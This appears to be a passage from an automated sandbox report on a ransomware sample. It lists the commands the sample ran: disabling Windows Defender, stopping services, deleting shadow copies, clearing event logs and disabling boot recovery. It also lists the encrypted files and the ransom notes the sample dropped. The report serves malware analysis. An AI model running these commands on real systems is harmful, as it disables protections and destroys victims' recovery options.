| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/760-54-0x0000000000000000-mapping.dmp
memory/1548-55-0x0000000000000000-mapping.dmp
memory/1092-56-0x0000000000000000-mapping.dmp
memory/1060-57-0x0000000000000000-mapping.dmp
memory/852-58-0x0000000000000000-mapping.dmp
memory/1828-59-0x0000000000000000-mapping.dmp
memory/1596-60-0x0000000000000000-mapping.dmp
memory/1304-61-0x0000000000000000-mapping.dmp
memory/432-62-0x0000000000000000-mapping.dmp
memory/1796-63-0x0000000000000000-mapping.dmp
memory/1876-64-0x0000000000000000-mapping.dmp
memory/1784-65-0x0000000000000000-mapping.dmp
memory/1388-66-0x0000000000000000-mapping.dmp
memory/1380-67-0x0000000000000000-mapping.dmp
memory/1068-68-0x0000000000000000-mapping.dmp
memory/1716-69-0x0000000000000000-mapping.dmp
memory/1364-70-0x0000000000000000-mapping.dmp
memory/1536-71-0x0000000000000000-mapping.dmp
memory/1948-72-0x0000000000000000-mapping.dmp
memory/836-73-0x0000000000000000-mapping.dmp
memory/2028-74-0x0000000000000000-mapping.dmp
memory/1560-75-0x0000000000000000-mapping.dmp
memory/1628-76-0x0000000000000000-mapping.dmp
memory/1712-77-0x0000000000000000-mapping.dmp
memory/1548-78-0x0000000000000000-mapping.dmp
memory/1652-79-0x0000000000000000-mapping.dmp
memory/624-80-0x0000000000000000-mapping.dmp
memory/1772-81-0x0000000000000000-mapping.dmp
memory/1816-82-0x0000000000000000-mapping.dmp
memory/1804-83-0x0000000000000000-mapping.dmp
memory/1784-84-0x0000000000000000-mapping.dmp
memory/1872-85-0x0000000000000000-mapping.dmp
memory/1748-86-0x0000000000000000-mapping.dmp
memory/1756-87-0x0000000000000000-mapping.dmp
memory/1244-88-0x0000000000000000-mapping.dmp
memory/924-89-0x0000000000000000-mapping.dmp
memory/1808-90-0x0000000000000000-mapping.dmp
memory/1316-91-0x0000000000000000-mapping.dmp
memory/1580-92-0x0000000000000000-mapping.dmp
memory/1540-93-0x0000000000000000-mapping.dmp
memory/1520-94-0x0000000000000000-mapping.dmp
memory/744-95-0x0000000000000000-mapping.dmp
memory/1796-96-0x0000000000000000-mapping.dmp
memory/1040-97-0x0000000000000000-mapping.dmp
memory/1940-98-0x0000000000000000-mapping.dmp
memory/1952-99-0x0000000000000000-mapping.dmp
memory/1724-100-0x0000000000000000-mapping.dmp
memory/848-101-0x0000000000000000-mapping.dmp
memory/1608-102-0x0000000000000000-mapping.dmp
memory/1860-103-0x0000000000000000-mapping.dmp
memory/1864-104-0x0000000000000000-mapping.dmp
memory/1852-105-0x0000000000000000-mapping.dmp
memory/968-106-0x0000000000000000-mapping.dmp
memory/1752-107-0x0000000000000000-mapping.dmp
memory/1656-108-0x0000000000000000-mapping.dmp
memory/1924-109-0x0000000000000000-mapping.dmp
memory/1528-110-0x0000000000000000-mapping.dmp
memory/1836-111-0x0000000000000000-mapping.dmp
memory/1624-112-0x0000000000000000-mapping.dmp
memory/1624-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
memory/892-114-0x0000000000000000-mapping.dmp
memory/592-116-0x0000000000000000-mapping.dmp
memory/1504-118-0x0000000000000000-mapping.dmp
memory/1292-119-0x0000000000000000-mapping.dmp
memory/980-120-0x0000000000000000-mapping.dmp
memory/2100-124-0x00000000024D2000-0x00000000024D4000-memory.dmp
memory/2100-125-0x00000000024D4000-0x00000000024D7000-memory.dmp
memory/2100-123-0x00000000024D0000-0x00000000024D2000-memory.dmp
memory/2100-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
memory/2100-126-0x000000001B740000-0x000000001BA3F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 600618bd4de1689a9c52d891ac0b1076 |
| SHA1 | 32061b5dda38d244f2c8b7ad454f713500234528 |
| SHA256 | d4e699fc7c48197c0c44769e3228bcf72dbde08ae3e33e3ac37a07360844378f |
| SHA512 | 59b00928ffc94d2b3791d5882139880170a745ddbe006eee28557efc4818804f61e3a35e918d36265784fb6c6b1f311c849b2bb80bd5d275377a61a0159bfda0 |
memory/2188-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
memory/2188-133-0x00000000029D4000-0x00000000029D7000-memory.dmp
memory/2188-132-0x00000000029D2000-0x00000000029D4000-memory.dmp
memory/2188-134-0x00000000029DB000-0x00000000029FA000-memory.dmp
memory/2188-131-0x00000000029D0000-0x00000000029D2000-memory.dmp
memory/2100-130-0x00000000024DB000-0x00000000024FA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 10:06
Reported
2022-01-13 10:11
Platform
win10-en-20211208
Max time kernel
184s
Max time network
179s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\Effects\dust.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_1s.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-100.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\tz_16x11.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterBold.ttf.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__IgAAACIAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__KAAAACgAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__OAAAADgAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\MJZ1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\MJZ1_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\MedTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Place\contrast-black\SmallTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\appuri.ot | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-black_scale-100.png.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\LoadIcon_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-256_altform-fullcolor.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Dismiss.scale-80.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\hu-HU\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__BgAAAAYAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashScreen.scale-100_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-40_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\WideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluNoInternetConnection_120x80.svg.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__CAAAAAgAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\micaut.dll.mui.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-150.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\ui-strings.js.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js.Hg6YxfA0hA-EWcOPkoT-0c2Cw5ToaKo1qraOCzgVeI__IgAAACIAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A |
